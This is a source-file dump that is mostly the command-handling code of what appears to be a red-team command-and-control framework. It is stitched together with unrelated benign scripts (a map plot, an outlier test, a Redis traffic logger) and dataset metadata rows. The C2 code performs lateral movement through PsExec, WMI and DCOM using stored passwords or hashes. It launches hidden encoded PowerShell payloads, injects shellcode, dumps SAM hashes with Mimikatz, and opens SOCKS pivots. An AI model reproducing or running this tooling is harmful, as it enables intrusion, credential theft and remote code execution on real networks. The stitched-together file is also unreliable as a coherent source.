startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-psexecdaisypayload"):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
daisyname = input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-psexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-psexecpayload"):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload)
new_task(cmd, user, randomuri)
# wmi lateral movement
elif command.startswith("invoke-wmiexec "):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
params = re.compile("invoke-wmiexec ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s" % params
new_task(cmd, user, randomuri)
elif command.startswith("invoke-wmijspbindpayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
target = re.search("(?<=-target )\\S*", str(cmd), re.IGNORECASE)
C2 = get_c2server_all()
print()
print("To connect to the SMB named pipe use the following command:")
print(Colours.GREEN+"invoke-pbind -target %s -secret mtkn4 -key %s -pname jaccdpqnvbrrxlaf -client" % (target[0],C2[2])+Colours.END)
print()
print("To issue commands to the SMB named pipe use the following command:")
print(Colours.GREEN+"pbind-command \"pwd\""+Colours.END)
print()
print("To load modules to the SMB named pipe use the following command:")
print(Colours.GREEN+"pbind-loadmodule Invoke-Mimikatz.ps1"+Colours.END)
print()
print("To kill the SMB named pipe use the following command:")
print(Colours.GREEN+"pbind-kill"+Colours.END)
elif command.startswith("invoke-wmijsproxypayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
if os.path.isfile(("%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy"))):
with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijsproxypayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-wmijsdaisypayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
daisyname = input("Name required: ")
if os.path.isfile(("%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname))):
with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijsdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname)), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-wmijspayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in command:
p = re.compile(r"-credid (\w*)")
credId = re.search(p, command)
if credId:
credId = credId.group(1)
else:
startup(user, "Please specify a credid")
creds = get_cred_by_id(credId)
if creds is None:
startup(user, "CredID not found")
params = params.replace("-credid %s" % credId, "")
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
elif command.startswith("invoke-wmiproxypayload"):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-wmidaisypayload"):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
daisyname = input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-wmipayload"):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload)
new_task(cmd, user, randomuri)
# dcom lateral movement
elif command.startswith("invoke-dcomproxypayload"):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-dcomdaisypayload"):
daisyname = input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-dcompayload"):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
# runas payloads
elif command.startswith("invoke-runas "):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runas ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
cmd = "invoke-runas %s" % params
new_task(cmd, user, randomuri)
elif command.startswith("invoke-runasdaisypayload"):
daisyname = input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-runasproxypayload"):
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
elif command.startswith("invoke-runaspayload"):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipe.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
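        # Note: "powershell -e" expects Base64 of a UTF-16LE encoded command, hence
        # pipe.encode('UTF-16LE') before base64.b64encode(). Minimal sketch with a
        # hypothetical command, for illustration only:
        #   base64.b64encode("whoami".encode('UTF-16LE')).decode("utf-8")  # -> "dwBoAG8AYQBtAGkA"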
elif command == "help" or command == "?":
print(posh_help)
elif command == "help 1":
print(posh_help1)
elif command == "help 2":
print(posh_help2)
elif command == "help 3":
print(posh_help3)
elif command == "help 4":
print(posh_help4)
elif command == "help 5":
print(posh_help5)
elif command == "help 6":
print(posh_help6)
elif command == "help 7":
print(posh_help7)
elif command == "help 8":
print(posh_help8)
elif command.startswith("get-pid"):
pid = get_implantdetails(randomuri)
print(pid[8])
elif command.startswith("upload-file"):
source = ""
destination = ""
s = ""
nothidden = False
if command == "upload-file":
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
commandloop(implant_id, user)
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
try:
with open(source, "rb") as source_file:
s = source_file.read()
if s:
sourceb64 = base64.b64encode(s).decode("utf-8")
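# Note (descriptive): base64 encoding inflates the upload by roughly 4/3, so large
# files produce proportionally larger tasking messages for the implant to fetch.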
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
else:
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
else:
print("Source file could not be read or was empty")
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc()
elif command == "kill-implant" or command == "exit":
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
elif command.startswith("unhide-implant"):
unhide_implant(randomuri)
elif command.startswith("hide-implant"):
kill_implant(randomuri)
elif command.startswith("migrate"):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, user, params)
elif command.startswith("loadmoduleforce"):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif command.startswith("loadmodule"):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif command.startswith("pbind-loadmodule"):
params = re.compile("pbind-loadmodule ", re.IGNORECASE)
params = params.sub("", command)
new_task(("pbind-loadmodule %s" % params), user, randomuri)
elif command.startswith("invoke-daisychain"):
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command, urls), user, randomuri)
print("Now use createdaisypayload")
elif command.startswith("inject-shellcode"):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
commandloop(implant_id, user)
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
arch = "64"
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
elif command == "listmodules":
modules = os.listdir("%s/Modules/" % POSHDIR)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if ".ps1" in mod:
print(mod)
elif command == "modulesloaded":
ml = get_implantdetails(randomuri)
print(ml[14])
elif command == "ps":
new_task("get-processlist", user, randomuri)
elif command == "hashdump":
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
elif command == "stopdaisy":
update_label("", randomuri)
new_task(command, user, randomuri)
elif command == "stopsocks":
update_label("", randomuri)
new_task(command, user, randomuri)
elif command == "sharpsocks":
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = select_item("HostnameIP", "C2Server")
sharpport = select_item("ServerPort", "C2Server")
dfheader = select_item("DomainFrontHeader", "C2Server")
implant = get_implantdetails(randomuri)
pivot = implant[15]
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
if (sharpport != 80 and sharpport != 443):
if (sharpurl.count("/") >= 3):
pat = re.compile(r"(?<!/)/(?!/)")
sharpurl = pat.sub(":%s/" % sharpport, sharpurl, 1)  # substitute into the URL string itself, not the built-in str
else:
sharpurl = ("%s:%s" % (sharpurl, sharpport))
print(POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
elif command == "history":
startup(user, get_history())
elif command.startswith("reversedns"):
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
elif command.startswith("createdaisypayload"):
createdaisypayload(user, startup)
elif command.startswith("createproxypayload"):
params = re.compile("createproxypayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if not creds['Password']:
startup(user, "This command does not support credentials with hashes")
createproxypayload(user, startup, creds)
elif command.startswith("createnewpayload"):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if not creds['Password']:
startup(user, "This command does not support credentials with hashes")
createproxypayload(user, startup, creds)
else:
if command:
new_task(command, user, randomuri)
return
def migrate(randomuri, user, params=""):
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "PS":
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR, arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
| 51.074026
| 300
| 0.588959
|
266234154c474d11bd5a3899761263d716593b79
| 1,241
|
py
|
Python
|
test/proj4/proj-regression-EPSG-4326-3.py
|
dvuckovic/magics-test
|
bd8baf97b0db986f6adf63700d3cf77bbcbad2f2
|
[
"Apache-2.0"
] | 7
|
2019-03-19T09:32:41.000Z
|
2022-02-07T13:20:33.000Z
|
test/proj4/proj-regression-EPSG-4326-3.py
|
dvuckovic/magics-test
|
bd8baf97b0db986f6adf63700d3cf77bbcbad2f2
|
[
"Apache-2.0"
] | 2
|
2021-03-30T05:37:20.000Z
|
2021-08-17T13:58:04.000Z
|
test/proj4/proj-regression-EPSG-4326-3.py
|
dvuckovic/magics-test
|
bd8baf97b0db986f6adf63700d3cf77bbcbad2f2
|
[
"Apache-2.0"
] | 5
|
2019-03-19T10:43:46.000Z
|
2021-09-09T14:28:39.000Z
|
from Magics.macro import *
import os
def plot_area(epsg, llx, lly, urx, ury):
img = os.path.basename(__file__).split('.')[0]
title = "Projection {} : [{:.2f}, {:.2f}, {:.2f}, {:.2f}]".format(epsg, llx, lly, urx, ury)
#Setting output
png = output(
output_formats = ['png'],
output_name = img,
output_name_first_page_number = 'off')
#Setting the geographical area
area = mmap(
subpage_lower_left_latitude = lly,
subpage_lower_left_longitude = llx,
subpage_map_projection = epsg,
subpage_upper_right_latitude = ury,
subpage_upper_right_longitude = urx,
subpage_map_area_definition = "corners"
)
#Setting the coastlines
background = mcoast(
map_coastline_land_shade = 'on',
map_coastline_resolution = "medium",
map_coastline_land_shade_colour = 'cream')
#Setting the title text
title = mtext(
text_lines = [title],
text_justification = 'left',
text_font_size = 0.6,
text_colour = 'charcoal')
#Plotting
plot(png,area,background,title,)
plot_area("EPSG:4326", -93.1904712370697, 7.324498226008458, -56.86549191675697, 79.97445686663391 )
| 28.860465
| 101
| 0.630137
|
ad4de74b5aa8a62b1f73687922de435f97c9949e
| 1,319
|
py
|
Python
|
ThomsonTau.py
|
BlancaNietoPetinal/Thompson-Tau-Method
|
2d4736ac8f3bef7f10d4e78312f5ff004f0e96a6
|
[
"Unlicense"
] | null | null | null |
ThomsonTau.py
|
BlancaNietoPetinal/Thompson-Tau-Method
|
2d4736ac8f3bef7f10d4e78312f5ff004f0e96a6
|
[
"Unlicense"
] | null | null | null |
ThomsonTau.py
|
BlancaNietoPetinal/Thompson-Tau-Method
|
2d4736ac8f3bef7f10d4e78312f5ff004f0e96a6
|
[
"Unlicense"
] | null | null | null |
import numpy as np
import scipy.stats as ss
def maxim(data):
'''
Calculates the maximum value in an array that may contain NaN values.
Inputs:
- data: array-like.
Outputs:
- m: the maximum (non-NaN) value in the array.
- ind: the index of the maximum.
'''
m = 0
ind = 0
for i in range(len(data)):
if not(np.isnan(data[i])) and data[i]>m:
m = data[i]
ind = i
return m,ind
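# Example: maxim(np.array([1.0, np.nan, 3.0, 2.0])) returns (3.0, 2).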
def thompson_tau(data, alpha=0.05, threshold=10):
# Information obtained from: https://www.statisticshowto.datasciencecentral.com/modified-thompson-tau-test/
'''
Implements the Thompson Tau method and returns a list with the outliers index.
Inputs:
- data: an array.
- alpha: the significance level, default 0.05.
- threshold: the maximum number of points to test (default 10).
Outputs:
- outliers: a list with the indices of the outliers.
'''
outliers = []
n = len(data)
mean = np.mean(data)
delta = abs(data-mean)
std = np.std(data)
for i in range(threshold):
d,ind = maxim(delta)
reject = ss.t.ppf(1 - alpha/2, n - 2)  # positive two-tailed critical t value, df = n - 2
tau = (reject*(n - 1))/(np.sqrt(n)*np.sqrt(n - 2 + np.power(reject,2)))
if d > tau*std:
outliers += [ind]
delta[ind] = None
return outliers
# An example to test it
data = np.array([489, 490, 490, 491, 494, 499, 499, 500, 501, 505])
print(thompson_tau(data,0.05,10))
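# A second illustrative run (hypothetical data): appending an obvious outlier to the same
# series should flag its index, since its deviation exceeds tau * std.
data_with_outlier = np.append(data, 700)
print(thompson_tau(data_with_outlier, alpha=0.05, threshold=3))  # expected: [10]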
| 26.38
| 109
| 0.639121
|
f10248c5a01558e78e0ee1df39d208b050fb38b1
| 2,830
|
py
|
Python
|
heliosburn/proxy/modules/traffic_reader.py
|
thecodeteam/heliosburn
|
513f6335c9788948d82e5c9285d7869f3ff4cc10
|
[
"MIT"
] | null | null | null |
heliosburn/proxy/modules/traffic_reader.py
|
thecodeteam/heliosburn
|
513f6335c9788948d82e5c9285d7869f3ff4cc10
|
[
"MIT"
] | null | null | null |
heliosburn/proxy/modules/traffic_reader.py
|
thecodeteam/heliosburn
|
513f6335c9788948d82e5c9285d7869f3ff4cc10
|
[
"MIT"
] | 1
|
2020-09-17T18:19:05.000Z
|
2020-09-17T18:19:05.000Z
|
from module import AbstractModule
from twisted.python import log
import json
import redis
from module_decorators import SkipHandler
class TrafficReader(AbstractModule):
"""
Extension of AbstractModule class used to serialize traffic
to a Redis pubsub channel.
"""
def _get_request_message(self, http_message):
request_headers = {k: v for (k, v) in http_message.requestHeaders.
getAllRawHeaders()}
message = {}
message['createdAt'] = http_message.createdAt
message['clientProtocol'] = http_message.clientproto
message['method'] = http_message.method
message['uri'] = http_message.uri
message['path'] = http_message.path
message['args'] = http_message.args
message['headers'] = request_headers
return message
def _get_response_message(self, http_message):
response_headers = {k: v for (k, v) in http_message.responseHeaders.
getAllRawHeaders()}
message = {}
message['createdAt'] = http_message.response_createdAt
message['clientProtocol'] = http_message.clientproto
message['statusCode'] = http_message.code
message['statusDescription'] = http_message.code_message
message['headers'] = response_headers
return message
def _get_traffic_message(self, http_message):
message = {}
message['transaction_id'] = str(http_message.transaction_id)
message['request_id'] = str(http_message.request_id)
message['response_id'] = str(http_message.response_id)
return message
def configure(self, **configs):
self.redis_host = configs['redis_host']
self.redis_port = configs['redis_port']
self.redis_db = configs['redis_db']
self.redis_pub_queue = configs['traffic_pub_queue']
self.redis_client = redis.StrictRedis(host=self.redis_host,
port=self.redis_port,
db=self.redis_db)
@SkipHandler
def handle_request(self, request):
message = self._get_traffic_message(request)
message['request'] = self._get_request_message(request)
self.redis_client.publish(self.redis_pub_queue, json.dumps(message))
log.msg("traffic read: " + str(message))
return request
@SkipHandler
def handle_response(self, response):
message = self._get_traffic_message(response)
message['request'] = self._get_request_message(response)
message['response'] = self._get_response_message(response)
self.redis_client.publish(self.redis_pub_queue, json.dumps(message))
log.msg("traffic read: " + str(message))
return response
traffic_reader = TrafficReader()
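# Minimal usage sketch (hypothetical Redis settings): configure() only stores the
# connection parameters and builds a lazy client; nothing is published until the proxy
# invokes handle_request / handle_response.
if __name__ == '__main__':
    traffic_reader.configure(
        redis_host='127.0.0.1',
        redis_port=6379,
        redis_db=0,
        traffic_pub_queue='heliosburn.traffic')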
| 34.512195
| 76
| 0.652297
|
240be5dabe80dff1c6f319951fcea012ff0b660f
| 42,079
|
py
|
Python
|
tensorflow/python/estimator/training.py
|
